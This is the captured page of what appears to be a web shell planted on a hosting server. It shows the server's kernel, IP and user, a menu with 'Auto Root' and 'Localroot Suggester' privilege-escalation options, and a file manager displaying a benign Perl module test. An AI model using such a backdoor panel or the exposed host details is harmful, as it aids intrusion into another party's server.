Linux sagir-us1.hostever.us 5.14.0-570.51.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Oct 8 09:41:34 EDT 2025 x86_64
LiteSpeed
Server IP : 104.247.108.91 & Your IP : 216.73.216.26
Domains : 74 Domain
User : georgeto
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
usr /
share /
doc /
perl-CPAN-Meta /
t /
parse-cpan-meta /
Delete
Unzip
Name
Size
Permission
Date
Action
02_api.t
7.72
KB
-rw-r--r--
2016-08-18 16:10
03_functions.t
562
B
-rw-r--r--
2016-08-18 16:10
04_export.t
446
B
-rw-r--r--
2016-08-18 16:10
05_errors.t
408
B
-rw-r--r--
2016-08-18 16:10
Save
Rename
#!/usr/bin/perl delete $ENV{PERL_YAML_BACKEND}; delete $ENV{PERL_JSON_BACKEND}; # Testing of basic document structures use strict; BEGIN { $| = 1; $^W = 1; } use Test::More tests => 4; use Parse::CPAN::Meta; ok not(defined &main::Load), 'Load is not exported'; ok not(defined &main::Dump), 'Dump is not exported'; ok not(defined &main::LoadFile), 'LoadFile is not exported'; ok not(defined &main::DumpFile), 'DumpFile is not exported';